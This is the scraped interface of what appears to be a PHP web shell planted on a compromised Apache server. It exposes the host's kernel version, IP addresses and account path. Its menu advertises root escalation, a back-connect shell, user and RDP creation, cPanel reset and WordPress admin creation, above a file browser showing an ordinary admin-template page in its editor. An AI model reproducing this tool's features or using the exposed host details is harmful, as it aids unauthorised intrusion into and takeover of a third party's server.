Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.218.113.187
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
eco-admin /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
checkbox-radio.php
31.96
KB
-rw-r--r--
components.php
89.01
KB
-rw-r--r--
data-table.php
11.55
KB
-rw-r--r--
email-templates-alert.html
9.62
KB
-rw-r--r--
email-templates-billing.html
16.7
KB
-rw-r--r--
empty.php
722
B
-rw-r--r--
error-404.php
1.91
KB
-rw-r--r--
forgot-password.php
2.57
KB
-rw-r--r--
form-fileupload.php
7.73
KB
-rw-r--r--
form-wizard.php
41.75
KB
-rw-r--r--
index.php
9.91
KB
-rw-r--r--
invoice.php
9.76
KB
-rw-r--r--
login.php
3.38
KB
-rw-r--r--
maintenance.php
3.62
KB
-rw-r--r--
modals.php
37.59
KB
-rw-r--r--
orderhistory.php
11.41
KB
-rw-r--r--
register.php
3.59
KB
-rw-r--r--
sweetalert.php
9.06
KB
-rw-r--r--
tables-basic.php
52.41
KB
-rw-r--r--
tables-datatable.php
30.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sweetalert.php
<?php include("includes/top-header.php");?> <link href="assets/libs/sweetalert2/sweetalert2.min.css" rel="stylesheet" type="text/css" /> <?php include("includes/side-header.php");?> <!-- Start Page Content here --> <div class="content-page"> <div class="content"> <!-- Start Content--> <div class="container-fluid"> <div class="row"> <div class="col-12"> <div class="card"> <div class="card-body"> <h4 class="header-title">Examples</h4> <p class="sub-header"> A beautiful, responsive, customizable, accessible (WAI-ARIA) replacement for JavaScript's popup boxes </p> <table class="table table-borderless table-centered mb-0"> <thead class="thead-light"> <tr> <th style="width:50%;">Alert Type</th> <th>Example</th> </tr> </thead> <tbody> <tr> <td>A basic message</td> <td> <button type="button" class="btn btn-info btn-xs" id="sa-basic">Click me</button> </td> </tr> <tr> <td>A title with a text under</td> <td> <button type="button" class="btn btn-info btn-xs" id="sa-title">Click me</button> </td> </tr> <tr> <td>A success message!</td> <td> <button type="button" class="btn btn-info btn-xs" id="sa-success">Click me</button> </td> </tr> <tr> <td>A modal window with a long content inside:</td> <td> <button type="button" class="btn btn-info btn-xs" id="sa-long-content">Click me</button> </td> </tr> <tr> <td>A custom positioned dialog</td> <td> <button type="button" class="btn btn-info btn-xs" id="sa-custom-position">Click me</button> </td> </tr> <tr> <td>A modal with a title, an error icon, a text, and a footer</td> <td> <button type="button" class="btn btn-info btn-xs" id="sa-error">Click me</button> </td> </tr> <tr> <td>A confirm dialog, with a function attached to the "Confirm"-button...</td> <td> <button type="button" class="btn btn-info btn-xs" id="sa-warning">Click me</button> </td> </tr> <tr> <td>By passing a parameter, you can execute something else for "Cancel".</td> <td> <button type="button" class="btn btn-info btn-xs" id="sa-params">Click me</button> </td> </tr> <tr> <td>A message with custom Image Header</td> <td> <button type="button" class="btn btn-info btn-xs" id="sa-image">Click me</button> </td> </tr> <tr> <td>A message with auto close timer</td> <td> <button type="button" class="btn btn-info btn-xs" id="sa-close">Click me</button> </td> </tr> <tr> <td>Custom HTML description and buttons</td> <td> <button type="button" class="btn btn-info btn-xs" id="custom-html-alert">Click me</button> </td> </tr> <tr> <td>A message with custom width, padding and background</td> <td> <button type="button" class="btn btn-info btn-xs" id="custom-padding-width-alert">Click me</button> </td> </tr> <tr> <td>Ajax request example</td> <td> <button type="button" class="btn btn-info btn-xs" id="ajax-alert">Click me</button> </td> </tr> <tr> <td>Chaining modals (queue) example</td> <td> <button type="button" class="btn btn-info btn-xs" id="chaining-alert">Click me</button> </td> </tr> <tr> <td>Dynamic queue example</td> <td> <button type="button" class="btn btn-info btn-xs" id="dynamic-alert">Click me</button> </td> </tr> </tbody> </table> </div> <!-- end card-body --> </div> </div> </div> <!-- end row --> </div> <!-- container-fluid --> </div> <!-- content --> <?php include("includes/copyright-footer.php");?> </div> <!-- End Page content --> </div> <!-- END wrapper --> <!-- Vendor js --> <script src="assets/js/vendor.min.js"></script> <!-- Sweet Alerts js --> <script src="assets/libs/sweetalert2/sweetalert2.min.js"></script> <!-- Sweet alert init js--> <script src="assets/js/pages/sweet-alerts.init.js"></script> <!-- App js --> <script src="assets/js/app.min.js"></script> </body> </html>
Close